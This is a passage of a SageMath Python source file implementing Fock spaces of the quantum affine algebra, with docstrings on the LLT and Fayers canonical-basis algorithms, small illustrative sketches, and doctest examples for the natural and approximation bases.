a description of the `U_q(\widehat{\mathfrak{gl}}_n)` action, as well
as an explicit description of the bar involution. In particular, the
bar involution is the unique semi-linear map satisfying
- `q \mapsto q^{-1}`,
- `\overline{| \emptyset \rangle} = | \emptyset \rangle`, and
- `\overline{f_i | \lambda \rangle} = f_i \overline{| \lambda \rangle}`.
We then define the *canonical basis* or *(lower) global crystal basis*
as the unique basis of `\mathcal{F}` such that
- `\overline{G(\lambda)} = G(\lambda)`,
- `G(\lambda) \equiv | \lambda \rangle \mod q \ZZ[q]`.
It is also known that this basis is upper unitriangular with respect to
dominance order and that both the natural basis and the canonical basis
of `\mathcal{F}` are `\ZZ`-graded by `|\lambda|`. Additionally, the
transition matrices `(d_{\lambda, \nu})_{\lambda,\nu \vdash n}` given by
.. MATH::
G(\nu) = \sum_{\lambda \vdash |\nu|} d_{\lambda,\nu} |\lambda \rangle
describe the decomposition matrices of the Hecke algebras when
restricting to `V(\mu)` [Ariki1996]_. For instance, for `n = 2` the
examples below give `G(2) = |2\rangle + q |1, 1\rangle`, so
`d_{(2),(2)} = 1` and `d_{(1,1),(2)} = q`.
To go between the canonical basis and the natural basis, for level 1
Fock space, we follow the LLT algorithm [LLT1996]_. Indeed, we first
construct a basis `\{ A(\nu) \}` that is an approximation to the
lower global crystal basis, in the sense that it is bar-invariant,
and then use Gaussian elimination to construct the lower global
crystal basis. For higher level Fock space, we follow [Fayers2010]_,
where the higher level is considered as a tensor product space
of the corresponding level 1 Fock spaces.
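The Gaussian elimination step only ever subtracts bar-invariant scalar
multiples of previously computed canonical basis elements. A rough,
self-contained sketch of the key scalar computation (the helper
``bar_symmetrize`` below is hypothetical and not part of this module;
Laurent polynomials in `q` are modelled as dictionaries mapping exponents
to coefficients) could look like::

    def bar_symmetrize(c):
        # Return the bar-invariant (q <-> 1/q symmetric) polynomial gamma
        # such that c - gamma lies in q*Z[q]; this is the multiple of
        # G(mu) subtracted during the triangular reduction (sketch only).
        gamma = {}
        if c.get(0):
            gamma[0] = c[0]
        for j, a in c.items():
            if j < 0 and a:
                gamma[j] = gamma.get(j, 0) + a
                gamma[-j] = gamma.get(-j, 0) + a
        return gamma

    # e.g. bar_symmetrize({-1: 2, 0: 3, 5: 7}) == {-1: 2, 0: 3, 1: 2},
    # so subtracting (2/q + 3 + 2*q) * G(mu) removes all terms that are
    # not in q*Z[q] from the coefficient of mu.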
There are three bases currently implemented:
- The natural basis:
:class:`~sage.algebras.quantum_groups.fock_space.FockSpace.F`.
- The approximation basis that comes from LLT(-type) algorithms:
:class:`~sage.algebras.quantum_groups.fock_space.FockSpace.A`.
- The lower global crystal basis:
:class:`~sage.algebras.quantum_groups.fock_space.FockSpace.G`.
.. TODO::
- Implement the approximation and lower global crystal bases on
all partition tuples.
- Implement the bar involution.
- Implement the full `U_q(\widehat{\mathfrak{gl}})`-action.
INPUT:
- ``n`` -- the value `n`
- ``multicharge`` -- (default: ``[0]``) the multicharge
- ``q`` -- (optional) the parameter `q`
- ``base_ring`` -- (optional) the base ring containing ``q``
EXAMPLES:
We start by constructing the natural basis and doing
some computations::
sage: Fock = FockSpace(3)
sage: F = Fock.natural()
sage: u = F.highest_weight_vector()
sage: u.f(0,2,(1,2),0)
|2, 2, 1> + q*|2, 1, 1, 1>
sage: u.f(0,2,(1,2),0,2)
|3, 2, 1> + q*|3, 1, 1, 1> + q*|2, 2, 2> + q^2*|2, 1, 1, 1, 1>
sage: x = u.f(0,2,(1,2),0,2)
sage: [x.h(i) for i in range(3)]
[q*|3, 2, 1> + q^2*|3, 1, 1, 1> + q^2*|2, 2, 2> + q^3*|2, 1, 1, 1, 1>,
|3, 2, 1> + q*|3, 1, 1, 1> + q*|2, 2, 2> + q^2*|2, 1, 1, 1, 1>,
|3, 2, 1> + q*|3, 1, 1, 1> + q*|2, 2, 2> + q^2*|2, 1, 1, 1, 1>]
sage: [x.h_inverse(i) for i in range(3)]
[1/q*|3, 2, 1> + |3, 1, 1, 1> + |2, 2, 2> + q*|2, 1, 1, 1, 1>,
|3, 2, 1> + q*|3, 1, 1, 1> + q*|2, 2, 2> + q^2*|2, 1, 1, 1, 1>,
|3, 2, 1> + q*|3, 1, 1, 1> + q*|2, 2, 2> + q^2*|2, 1, 1, 1, 1>]
sage: x.d()
1/q^2*|3, 2, 1> + 1/q*|3, 1, 1, 1> + 1/q*|2, 2, 2> + |2, 1, 1, 1, 1>
Next, we construct the approximation and lower global crystal bases
and convert to the natural basis::
sage: A = Fock.A()
sage: G = Fock.G()
sage: F(A[4,2,2,1])
|4, 2, 2, 1> + q*|4, 2, 1, 1, 1>
sage: F(G[4,2,2,1])
|4, 2, 2, 1> + q*|4, 2, 1, 1, 1>
sage: F(A[7,3,2,1,1])
|7, 3, 2, 1, 1> + q*|7, 2, 2, 2, 1> + q^2*|7, 2, 2, 1, 1, 1>
+ q*|6, 3, 3, 1, 1> + q^2*|6, 2, 2, 2, 2> + q^3*|6, 2, 2, 1, 1, 1, 1>
+ q*|5, 5, 2, 1, 1> + q^2*|5, 4, 3, 1, 1> + (q^2+1)*|4, 4, 3, 2, 1>
+ (q^3+q)*|4, 4, 3, 1, 1, 1> + (q^3+q)*|4, 4, 2, 2, 2>
+ (q^4+q^2)*|4, 4, 2, 1, 1, 1, 1> + q*|4, 3, 3, 3, 1>
+ q^2*|4, 3, 2, 1, 1, 1, 1, 1> + q^2*|4, 2, 2, 2, 2, 2>
+ q^3*|4, 2, 2, 2, 1, 1, 1, 1> + q^2*|3, 3, 3, 3, 2>
+ q^3*|3, 3, 3, 1, 1, 1, 1, 1> + q^3*|3, 2, 2, 2, 2, 2, 1>
+ q^4*|3, 2, 2, 2, 2, 1, 1, 1>
sage: F(G[7,3,2,1,1])
|7, 3, 2, 1, 1> + q*|7, 2, 2, 2, 1> + q^2*|7, 2, 2, 1, 1, 1>
+ q*|6, 3, 3, 1, 1> + q^2*|6, 2, 2, 2, 2>
+ q^3*|6, 2, 2, 1, 1, 1, 1> + q*|5, 5, 2, 1, 1>
+ q^2*|5, 4, 3, 1, 1> + q^2*|4, 4, 3, 2, 1>
+ q^3*|4, 4, 3, 1, 1, 1> + q^3*|4, 4, 2, 2, 2>
+ q^4*|4, 4, 2, 1, 1, 1, 1>
sage: A(F(G[7,3,2,1,1]))
A[7, 3, 2, 1, 1] - A[4, 4, 3, 2, 1]
sage: G(F(A[7,3,2,1,1]))
G[7, 3, 2, 1, 1] + G[4, 4, 3, 2, 1]
sage: A(F(G[8,4,3,2,2,1]))
A[8, 4, 3, 2, 2, 1] - A[6, 4, 4, 2, 2, 1, 1] - A[5, 5, 4, 3, 2, 1]
+ ((-q^2-1)/q)*A[5, 4, 4, 3, 2, 1, 1]
sage: G(F(A[8,4,3,2,2,1]))
G[8, 4, 3, 2, 2, 1] + G[6, 4, 4, 2, 2, 1, 1] + G[5, 5, 4, 3, 2, 1]
+ ((q^2+1)/q)*G[5, 4, 4, 3, 2, 1, 1]
We can also construct higher level Fock spaces and perform
similar computations::
sage: Fock = FockSpace(3, [1,0])
sage: F = Fock.natural()
sage: A = Fock.A()
sage: G = Fock.G()
sage: F(G[[2,1],[4,1,1]])
|[2, 1], [4, 1, 1]> + q*|[2, 1], [3, 2, 1]>
+ q^2*|[2, 1], [3, 1, 1, 1]> + q^2*|[2], [4, 2, 1]>
+ q^3*|[2], [4, 1, 1, 1]> + q^4*|[2], [3, 2, 1, 1]>
+ q*|[1, 1, 1], [4, 1, 1]> + q^2*|[1, 1, 1], [3, 2, 1]>
+ q^3*|[1, 1, 1], [3, 1, 1, 1]> + q^2*|[1, 1], [3, 2, 2]>
+ q^3*|[1, 1], [3, 1, 1, 1, 1]> + q^3*|[1], [4, 2, 2]>
+ q^4*|[1], [4, 1, 1, 1, 1]> + q^4*|[1], [3, 2, 2, 1]>
+ q^5*|[1], [3, 2, 1, 1, 1]>
sage: A(F(G[[2,1],[4,1,1]]))
A([2, 1], [4, 1, 1]) - A([2], [4, 2, 1])
sage: G(F(A[[2,1],[4,1,1]]))
G([2, 1], [4, 1, 1]) + G([2], [4, 2, 1])
For level `1`, the truncated Fock space of [GW1999]_
is implemented. This can be used to improve the speed
of the computation of the lower global crystal basis,
provided the truncation is not too small::
sage: FS = FockSpace(2)
sage: F = FS.natural()
sage: G = FS.G()
sage: FS3 = FockSpace(2, truncated=3)
sage: F3 = FS3.natural()
sage: G3 = FS3.G()
sage: F(G[6,2,1])
|6, 2, 1> + q*|5, 3, 1> + q^2*|5, 2, 2> + q^3*|5, 2, 1, 1>
+ q*|4, 2, 1, 1, 1> + q^2*|3, 3, 1, 1, 1> + q^3*|3, 2, 2, 1, 1>
+ q^4*|3, 2, 1, 1, 1, 1>
sage: F3(G3[6,2,1])
|6, 2, 1> + q*|5, 3, 1> + q^2*|5, 2, 2>
sage: FS5 = FockSpace(2, truncated=5)
sage: F5 = FS5.natural()
sage: G5 = FS5.G()
sage: F5(G5[6,2,1])
|6, 2, 1> + q*|5, 3, 1> + q^2*|5, 2, 2> + q^3*|5, 2, 1, 1>
+ q*|4, 2, 1, 1, 1> + q^2*|3, 3, 1, 1, 1> + q^3*|3, 2, 2, 1, 1>
REFERENCES:
- [Ariki1996]_
- [LLT1996]_
- [Fayers2010]_
- [GW1999]_
"""
@staticmethod
def __classcall_private__(cls, n, multicharge=[0], q=None, base_ring=None, truncated=None):
r"""
Standardize input to ensure a unique representation.
EXAMPLES::
sage: R.<q> = ZZ[]
sage: F1 = FockSpace(3, [0])
sage: F2 = FockSpace(3, 0, q)
sage: F3 = FockSpace(3, (0,), q, R)
sage: F1 is F2 and F2 is F3
True
"""
if q is None:
base_ring = PolynomialRing(ZZ, 'q')
q = base_ring.gen(0)
if base_ring is None:
base_ring = q.parent()
base_ring = FractionField(base_ring)
q = base_ring(q)
M = IntegerModRing(n)
if multicharge in ZZ:
multicharge = (multicharge,)
multicharge = tuple(M(e) for e in multicharge)
if truncated is not None:
return FockSpaceTruncated(n, truncated, q, base_ring)
return super(FockSpace, cls).__classcall__(cls, n, multicharge, q, base_ring)
def __init__(self, n, multicharge, q, base_ring):
r"""
Initialize ``self``.
EXAMPLES::
sage: F = FockSpace(3, [0])
sage: TestSuite(F).run()
sage: F = FockSpace(3, [1, 2])
sage: TestSuite(F).run()
"""
self._n = n
self._q = q
self._multicharge = multicharge
self._index_set = set(range(n))
cat = ModulesWithBasis(base_ring).WithRealizations()
Parent.__init__(self, base=base_ring, category=cat)
self._realizations = [self.natural(), self.A(), self.G()]
def _repr_(self):
r"""
Return a string representation of ``self``.
EXAMPLES::
sage: FockSpace(2)
Fock space of rank 2 of multicharge (0,) over Fraction Field
of Univariate Polynomial Ring in q over Integer Ring
sage: FockSpace(4, [2, 0, 1])
Fock space of rank 4 of multicharge (2, 0, 1) over Fraction Field
of Univariate Polynomial Ring in q over Integer Ring
"""
return "Fock space of rank {} of multicharge {} over {}".format(
self._n, self._multicharge, self.base_ring())
def _latex_(self):
r"""
Return a latex representation of ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: latex(F)
\mathcal{F}_{q}^{2}\left(0\right)
sage: F = FockSpace(4, [2, 0, 1])
sage: latex(F)
\mathcal{F}_{q}^{4}\left(2, 0, 1\right)
"""
from sage.misc.latex import latex
return "\\mathcal{{F}}_{{{q}}}^{{{n}}}{mc}".format(q=latex(self._q), n=self._n,
mc=latex(self._multicharge))
options = FockSpaceOptions
def q(self):
r"""
Return the parameter `q` of ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: F.q()
q
sage: F = FockSpace(2, q=-1)
sage: F.q()
-1
"""
return self._q
def multicharge(self):
r"""
Return the multicharge of ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: F.multicharge()
(0,)
sage: F = FockSpace(4, [2, 0, 1])
sage: F.multicharge()
(2, 0, 1)
"""
return self._multicharge
def a_realization(self):
r"""
Return a realization of ``self``.
EXAMPLES::
sage: FS = FockSpace(2)
sage: FS.a_realization()
Fock space of rank 2 of multicharge (0,) over
Fraction Field of Univariate Polynomial Ring in q over Integer Ring
in the natural basis
"""
return self.natural()
def inject_shorthands(self, verbose=True):
r"""
Import standard shorthands into the global namespace.
INPUT:
- ``verbose`` -- boolean (default: ``True``); if ``True``, print
the defined shorthands
EXAMPLES::
sage: FS = FockSpace(4)
sage: FS.inject_shorthands()
Injecting A as shorthand for Fock space of rank 4
of multicharge (0,) over Fraction Field
of Univariate Polynomial Ring in q over Integer Ring
in the approximation basis
Injecting F as shorthand for Fock space of rank 4
of multicharge (0,) over Fraction Field
of Univariate Polynomial Ring in q over Integer Ring
in the natural basis
Injecting G as shorthand for Fock space of rank 4
of multicharge (0,) over Fraction Field
of Univariate Polynomial Ring in q over Integer Ring
in the lower global crystal basis
"""
from sage.misc.misc import inject_variable
for shorthand in ['A', 'F', 'G']:
realization = getattr(self, shorthand)()
if verbose:
print('Injecting {} as shorthand for {}'.format(shorthand, realization))
inject_variable(shorthand, realization)
def highest_weight_vector(self):
r"""
Return the module generator of ``self`` in the natural basis.
EXAMPLES::
sage: FS = FockSpace(2)
sage: FS.highest_weight_vector()
|>
sage: FS = FockSpace(4, [2, 0, 1])
sage: FS.highest_weight_vector()
|[], [], []>
"""
return self.natural().highest_weight_vector()
def __getitem__(self, i):
r"""
Return the basis element indexed by ``i``.
INPUT:
- ``i`` -- a partition
EXAMPLES::
sage: FS = FockSpace(2)
sage: FS[[]]
|>
sage: FS[1]
|1>
sage: FS[2,2,1]
|2, 2, 1>
sage: FS = FockSpace(3, [1, 2])
sage: FS[[], []]
|[], []>
sage: FS[[2,1], [3,1,1]]
|[2, 1], [3, 1, 1]>
"""
return self.natural()[i]
class F(CombinatorialFreeModule, BindableClass):
r"""
The natural basis of the Fock space.
This is the basis indexed by partitions. This has an action
of the quantum group `U_q(\widehat{\mathfrak{sl}}_n)`
described in
:class:`~sage.algebras.quantum_groups.fock_space.FockSpace`.
EXAMPLES:
We construct the natural basis and perform some computations::
sage: F = FockSpace(4).natural()
sage: q = F.q()
sage: u = F.highest_weight_vector()
sage: u
|>
sage: u.f(0,1,2)
|3>
sage: u.f(0,1,3)
|2, 1>
sage: u.f(0,1,2,0)
0
sage: u.f(0,1,3,2)
|3, 1> + q*|2, 1, 1>
sage: u.f(0,1,2,3)
|4> + q*|3, 1>
sage: u.f(0,1,3,2,2,0)
((q^2+1)/q)*|3, 2, 1>
sage: x = (q^4 * u + u.f(0,1,3,(2,2)))
sage: x
|3, 1, 1> + q^4*|>
sage: x.f(0,1,3)
|4, 3, 1> + q*|4, 2, 1, 1> + q*|3, 3, 2>
+ q^2*|3, 2, 2, 1> + q^4*|2, 1>
sage: x.h_inverse(2)
q^2*|3, 1, 1> + q^4*|>
sage: x.h_inverse(0)
1/q*|3, 1, 1> + q^3*|>
sage: x.d()
1/q*|3, 1, 1> + q^4*|>
sage: x.e(2)
|3, 1> + q*|2, 1, 1>
"""
def __init__(self, F):
"""
Initialize ``self``.
EXAMPLES::
sage: F = FockSpace(2).natural()
sage: TestSuite(F).run() # long time
"""
self._basis_name = "natural"
# If the cell x is above the cell y
if len(F._multicharge) == 1: # For partitions
self._above = lambda x,y: x[0] < y[0]
else: # For partition tuples
self._above = lambda x,y: x[0] < y[0] or (x[0] == y[0] and x[1] < y[1])
self._addable = lambda la,i: [x for x in la.outside_corners()
if la.content(*x, multicharge=F._multicharge) == i]
self._removable = lambda la,i: [x for x in la.corners()
if la.content(*x, multicharge=F._multicharge) == i]
indices = PartitionTuples(level=len(F._multicharge))
CombinatorialFreeModule.__init__(self, F.base_ring(), indices,
prefix='F',
latex_prefix='',
bracket=False,
latex_bracket=['\\left\\lvert', '\\right\\rangle'],
sorting_reverse=True,
category=FockSpaceBases(F))
options = FockSpaceOptions
def _repr_term(self, m):
r"""
Return a representation of the monomial indexed by ``m``.
EXAMPLES::
sage: F = FockSpace(2).natural()
sage: F._repr_term(Partition([2,1,1]))
'|2, 1, 1>'
sage: F.highest_weight_vector()
|>
sage: F = FockSpace(2, [2, 1, 1]).natural()
sage: mg = F.highest_weight_vector(); mg
|[], [], []>
sage: q = F.q()
sage: mg.f(1).f(1).f(0) / (q^-1 + q)
|[1], [1], [1]> + q*|[], [2], [1]> + q^2*|[], [1, 1], [1]>
+ q^3*|[], [1], [2]> + q^4*|[], [1], [1, 1]>
"""
if self.options.display != 'ket':
return CombinatorialFreeModule._repr_term(self, m)
return '|' + m._repr_list()[1:-1] + ">" # Strip the outer brackets of m
def _ascii_art_term(self, m):
r"""
Return a representation of the monomial indexed by ``m``.
EXAMPLES::
sage: FS = FockSpace(4)
sage: F = FS.natural()
sage: x = F.an_element()
sage: ascii_art(x)
3*|**> + 2*|*> + 2*|->
sage: ascii_art(x.f(3,2,2,0,1))
((3*q^2+3)/q)*|***\ + (3*q^2+3)*|***\
|*** > |** \
|* / |* /
|* /
"""
if self.options.display != 'ket':
return CombinatorialFreeModule._ascii_art_term(self, m)
from sage.typeset.ascii_art import AsciiArt, ascii_art
a = ascii_art(m)
h = a.height()
l = AsciiArt(['|']*h)
r = AsciiArt([' '*i + '\\' for i in range(h//2)], baseline=0)
if h % 2:
r *= AsciiArt([' '*(h//2) + '>'], baseline=0)
r *= AsciiArt([' '*i + '/' for i in reversed(range(h//2))], baseline=0)
ret = l + a + r
ret._baseline = h - 1
return ret
def _unicode_art_term(self, m):
r"""
Return a unicode art representation of the generator indexed by ``m``.
TESTS::
sage: FS = FockSpace(4)
sage: F = FS.natural()
sage: x = F.an_element()
sage: unicode_art(x)
3*│┌┬┐╲ + 2*│┌┐╲ + 2*│∅〉
│└┴┘╱ │└┘╱
sage: unicode_art(x.f(3,2,2,0,1))
((3*q^2+3)/q)*│┌┬┬┐╲ + (3*q^2+3)*│┌┬┬┐╲
│├┼┼┤ ╲ │├┼┼┘ ╲
│├┼┴┘ ╱ │├┼┘ 〉
│└┘ ╱ │├┤ ╱
│└┘ ╱
"""
if self.options.display != 'ket':
return CombinatorialFreeModule._ascii_art_term(self, m)
from sage.typeset.unicode_art import UnicodeArt, unicode_art
a = unicode_art(m)
h = a.height()
l = UnicodeArt([u'│']*h, baseline=0)
r = UnicodeArt([u" "*i + u'╲' for i in range(h//2)], baseline=0)
if h % 2:
r *= UnicodeArt([u" "*(h//2) + u'〉'], baseline=0)
r *= UnicodeArt([u" "*i + u'╱' for i in reversed(range(h//2))], baseline=0)
ret = l + a + r
ret._baseline = h - 1
return ret
def _test_representation(self, **options):
r"""
Test that ``self`` is a
`U_q(\widehat{\mathfrak{sl}}_n)`-representation.
EXAMPLES::
sage: F = FockSpace(3, [0,1]).natural()
sage: F._test_representation() # long time
"""
from sage.combinat.root_system.cartan_matrix import CartanMatrix
from sage.combinat.root_system.root_system import RootSystem
from sage.algebras.quantum_groups.q_numbers import q_binomial
tester = self._tester(**options)
F = self.realization_of()
q = F.q()
n = F._n
I = F._index_set
A = CartanMatrix(['A',n-1,1])
P = RootSystem(['A',n-1,1]).weight_lattice()
al = P.simple_roots()
ac = P.simple_coroots()
zero = self.zero()
for x in self.some_elements():
for i in I:
for j in I:
tester.assertEqual(x.h_inverse(j).f(i).h(j), q**-al[i].scalar(ac[j]) * x.f(i))
tester.assertEqual(x.h_inverse(j).e(i).h(j), q**al[i].scalar(ac[j]) * x.e(i))
if i == j:
tester.assertEqual(x.f(i).e(i) - x.e(i).f(i),
(x.h(i) - x.h_inverse(i)) / (q - q**-1))
continue
tester.assertEqual(x.f(j).e(i) - x.e(i).f(j), zero)
aij = A[i,j]
tester.assertEqual(zero,
sum((-1)**k
* q_binomial(1-aij, k, q)
* x.e(*([i]*(1-aij-k) + [j] + [i]*k))
for k in range(1-aij+1)))
tester.assertEqual(zero,
sum((-1)**k
* q_binomial(1-aij, k, q)
* x.f(*([i]*(1-aij-k) + [j] + [i]*k))
for k in range(1-aij+1)))
class Element(CombinatorialFreeModule.Element):
"""
An element in the Fock space.
"""
def _e(self, i):
r"""
Apply `e_i` to ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: F[2,1,1]._e(1)
1/q*|1, 1, 1>
sage: F[2,1,1]._e(0)
|2, 1>
sage: F[3,2,1]._e(1)
0
sage: F = FockSpace(4, [2, 0, 1])
sage: F[[2,1],[1],[2]]._e(2)
|[2, 1], [1], [1]>
"""
P = self.parent()
def N_left(la, x, i):
return (sum(1 for y in P._addable(la, i) if P._above(x, y))
- sum(1 for y in P._removable(la, i) if P._above(x, y)))
q = P.realization_of()._q
return P.sum_of_terms(( la.remove_cell(*x), c * q**(-N_left(la, x, i)) )
for la,c in self for x in P._removable(la, i))
def e(self, *data):
r"""
Apply the action of the divided power
`e_i^{(p)}` on ``self``.
INPUT:
- ``*data`` -- a list of indices or pairs `(i, p)`
EXAMPLES::
sage: F = FockSpace(2)
sage: F[2,1,1].e(1)
1/q*|1, 1, 1>
sage: F[2,1,1].e(0)
|2, 1>
sage: F[2,1,1].e(0).e(1)
|2> + q*|1, 1>
sage: F[2,1,1].e(0).e(1).e(1)
((q^2+1)/q)*|1>
sage: F[2,1,1].e(0).e((1, 2))
|1>
sage: F[2,1,1].e(0, 1, 1, 1)
0
sage: F[2,1,1].e(0, (1, 3))
0
sage: F[2,1,1].e(0, (1,2), 0)
|>
sage: F[2,1,1].e(1, 0, 1, 0)
1/q*|>
sage: F = FockSpace(4, [2, 0, 1])
sage: F[[2,1],[1],[2]]
|[2, 1], [1], [2]>
sage: F[[2,1],[1],[2]].e(2)
|[2, 1], [1], [1]>
sage: F[[2,1],[1],[2]].e(1)
1/q*|[2], [1], [2]>
sage: F[[2,1],[1],[2]].e(0)
1/q*|[2, 1], [], [2]>
sage: F[[2,1],[1],[2]].e(3)
1/q^2*|[1, 1], [1], [2]>
sage: F[[2,1],[1],[2]].e(3, 2, 1)
1/q^2*|[1, 1], [1], []> + 1/q^2*|[1], [1], [1]>
sage: F[[2,1],[1],[2]].e(3, 2, 1, 0, 1, 2)
2/q^3*|[], [], []>
"""
ret = self
q = self.parent().realization_of()._q
I = self.parent().realization_of()._index_set
for i in data:
if isinstance(i, tuple):
i, p = i
else:
p = 1
if i not in I:
raise ValueError("{} not in the index set".format(i))
for _ in range(p):
ret = ret._e(i)
if p > 1:
ret = ret / q_factorial(p, q)
return ret
def _f(self, i):
r"""
Apply `f_i` to ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: F.highest_weight_vector()._f(0)
|1>
sage: F[5,2,2,1]._f(0)
1/q*|5, 2, 2, 2> + |5, 2, 2, 1, 1>
sage: F[5,2,2,1]._f(1)
|6, 2, 2, 1> + q*|5, 3, 2, 1>
sage: F = FockSpace(4, [2, 0, 1])
sage: F[[3,1], [1,1,1], [4,2,2]]._f(0)
1/q*|[3, 1, 1], [1, 1, 1], [4, 2, 2]>
sage: F[[3,1], [1,1,1], [4,2,2]]._f(1)
|[4, 1], [1, 1, 1], [4, 2, 2]>
+ |[3, 1], [2, 1, 1], [4, 2, 2]>
+ q*|[3, 1], [1, 1, 1, 1], [4, 2, 2]>
+ q^2*|[3, 1], [1, 1, 1], [5, 2, 2]>
"""
P = self.parent()
def N_right(la, x, i):
return (sum(1 for y in P._addable(la, i) if P._above(y, x))
- sum(1 for y in P._removable(la, i) if P._above(y, x)))
q = P.realization_of()._q
return P.sum_of_terms( (la.add_cell(*x), c * q**N_right(la, x, i))
for la,c in self for x in P._addable(la, i) )
def f(self, *data):
r"""
Apply the action of the divided power
`f_i^{(p)}` on ``self``.
INPUT:
- ``*data`` -- a list of indices or pairs `(i, p)`
EXAMPLES::
sage: F = FockSpace(2)
sage: mg = F.highest_weight_vector()
sage: mg.f(0)
|1>
sage: mg.f(0).f(1)
|2> + q*|1, 1>
sage: mg.f(0).f(0)
0
sage: mg.f((0, 2))
0
sage: mg.f(0, 1, 1)
((q^2+1)/q)*|2, 1>
sage: mg.f(0, (1, 2))
|2, 1>
sage: mg.f(0, 1, 0)
|3> + q*|1, 1, 1>
sage: F = FockSpace(4, [2, 0, 1])
sage: mg = F.highest_weight_vector()
sage: mg.f(0)
|[], [1], []>
sage: mg.f(2)
|[1], [], []>
sage: mg.f(1)
|[], [], [1]>
sage: mg.f(1, 0)
|[], [1], [1]> + q*|[], [], [1, 1]>
sage: mg.f(0, 1)
|[], [2], []> + q*|[], [1], [1]>
sage: mg.f(0, 1, 3)
|[], [2, 1], []> + q*|[], [1, 1], [1]>
sage: mg.f(3)
0
"""
ret = self
q = self.parent().realization_of()._q
I = self.parent().realization_of()._index_set
for i in data:
if isinstance(i, tuple):
i, p = i
else:
p = 1
if i not in I:
raise ValueError("{} not in the index set".format(i))
for _ in range(p):
ret = ret._f(i)
if p > 1:
ret = ret / q_factorial(p, q)
return ret
def h(self, *data):
r"""
Apply the action of `h_i` on ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: F[2,1,1].h(0)
q*|2, 1, 1>
sage: F[2,1,1].h(1)
|2, 1, 1>
sage: F[2,1,1].h(0, 0)
q^2*|2, 1, 1>
sage: F = FockSpace(4, [2,0,1])
sage: elt = F[[2,1],[1],[2]]
sage: elt.h(0)
q^2*|[2, 1], [1], [2]>
sage: elt.h(1)
|[2, 1], [1], [2]>
sage: elt.h(2)
|[2, 1], [1], [2]>
sage: elt.h(3)
q*|[2, 1], [1], [2]>
"""
P = self.parent()
q = P.realization_of()._q
I = self.parent().realization_of()._index_set
d = self.monomial_coefficients(copy=True)
for i in data:
if i not in I:
raise ValueError("{} not in the index set".format(i))
for la in d:
d[la] *= q**(len(P._addable(la, i)) - len(P._removable(la, i)))
return P._from_dict(d, coerce=False)
def h_inverse(self, *data):
r"""
Apply the action of `h_i^{-1}` on ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: F[2,1,1].h_inverse(0)
1/q*|2, 1, 1>
sage: F[2,1,1].h_inverse(1)
|2, 1, 1>
sage: F[2,1,1].h_inverse(0, 0)
1/q^2*|2, 1, 1>
sage: F = FockSpace(4, [2,0,1])
sage: elt = F[[2,1],[1],[2]]
sage: elt.h_inverse(0)
1/q^2*|[2, 1], [1], [2]>
sage: elt.h_inverse(1)
|[2, 1], [1], [2]>
sage: elt.h_inverse(2)
|[2, 1], [1], [2]>
sage: elt.h_inverse(3)
1/q*|[2, 1], [1], [2]>
"""
P = self.parent()
q = P.realization_of()._q
I = self.parent().realization_of()._index_set
d = self.monomial_coefficients(copy=True)
for i in data:
if i not in I:
raise ValueError("{} not in the index set".format(i))
for la in d:
d[la] *= q**-(len(P._addable(la, i)) - len(P._removable(la, i)))
return P._from_dict(d, coerce=False)
def d(self):
r"""
Apply the action of `d` on ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: F.highest_weight_vector().d()
|>
sage: F[2,1,1].d()
1/q^2*|2, 1, 1>
sage: F[5,3,3,1,1,1].d()
1/q^7*|5, 3, 3, 1, 1, 1>
sage: F = FockSpace(4, [2,0,1])
sage: F.highest_weight_vector().d()
|[], [], []>
sage: F[[2,1],[1],[2]].d()
1/q*|[2, 1], [1], [2]>
sage: F[[4,2,2,1],[1],[5,2]].d()
1/q^5*|[4, 2, 2, 1], [1], [5, 2]>
"""
P = self.parent()
R = P.realization_of()
q = R._q
d = self.monomial_coefficients(copy=True)
for la in d:
d[la] *= q**-sum(1 for x in la.cells()
if la.content(*x, multicharge=R._multicharge) == 0)
return P._from_dict(d, coerce=False)
natural = F
class A(CombinatorialFreeModule, BindableClass):
r"""
The `A` basis of the Fock space which is the approximation
of the lower global crystal basis.
The approximation basis `A` is constructed from the highest
weight element by applying divided powers `f_i^{(p)}` following
the ladder construction of [LLT1996]_ and [GW1999]_. As a
result, this basis is bar invariant and upper unitriangular
(with respect to dominance order on partitions) when expressed
in the natural basis. It is then converted to the lower global
crystal basis by Gaussian elimination; an illustrative sketch
of the ladder bookkeeping is given below.
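As a plain Python sketch of that ladder bookkeeping (illustrative only,
for level 1 with multicharge `(r)`; the name ``ladder_sequence`` is ad
hoc), the cells of `\nu` are grouped by ladder number
`b = \mathrm{row} + (n-1)\,\mathrm{col}`, and each nonempty ladder
contributes one divided power `f_i^{(p)}` applied to the highest weight
vector::

    def ladder_sequence(la, n, r=0):
        # Return [(i, p), ...]: for each nonempty ladder b (in increasing
        # order), the residue i = (r - b) mod n acted on and the number p
        # of cells of la on that ladder, i.e. the divided power f_i^{(p)}.
        cells = [(row, col) for row, length in enumerate(la) for col in range(length)]
        ladders = {}
        for row, col in cells:
            b = row + (n - 1) * col
            ladders[b] = ladders.get(b, 0) + 1
        return [((r - b) % n, ladders[b]) for b in sorted(ladders)]

    # e.g. ladder_sequence([2, 1], 3) == [(0, 1), (2, 1), (1, 1)], i.e. the
    # product f_1^{(1)} f_2^{(1)} f_0^{(1)} applied to the empty partition.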
EXAMPLES:
We construct Example 6.5 and 6.7 in [LLT1996]_::
sage: FS = FockSpace(2)
sage: F = FS.natural()
sage: G = FS.G()
sage: A = FS.A()
sage: F(A[5])
|5> + |3, 2> + 2*q*|3, 1, 1> + q^2*|2, 2, 1> + q^2*|1, 1, 1, 1, 1>
sage: F(A[4,1])
|4, 1> + q*|2, 1, 1, 1>
sage: F(A[3,2])
|3, 2> + q*|3, 1, 1> + q^2*|2, 2, 1>
sage: F(G[5])
|5> + q*|3, 1, 1> + q^2*|1, 1, 1, 1, 1>
We construct the examples in Section 5.1 of [Fayers2010]_::
sage: FS = FockSpace(2, [0, 0])
sage: F = FS.natural()
sage: A = FS.A()
sage: F(A[[2,1],[1]])
|[2, 1], [1]> + q*|[2], [2]> + q^2*|[2], [1, 1]> + q^2*|[1, 1], [2]>
+ q^3*|[1, 1], [1, 1]> + q^4*|[1], [2, 1]>
sage: F(A[[4],[]])
|[4], []> + q*|[3, 1], []> + q*|[2, 1, 1], []>
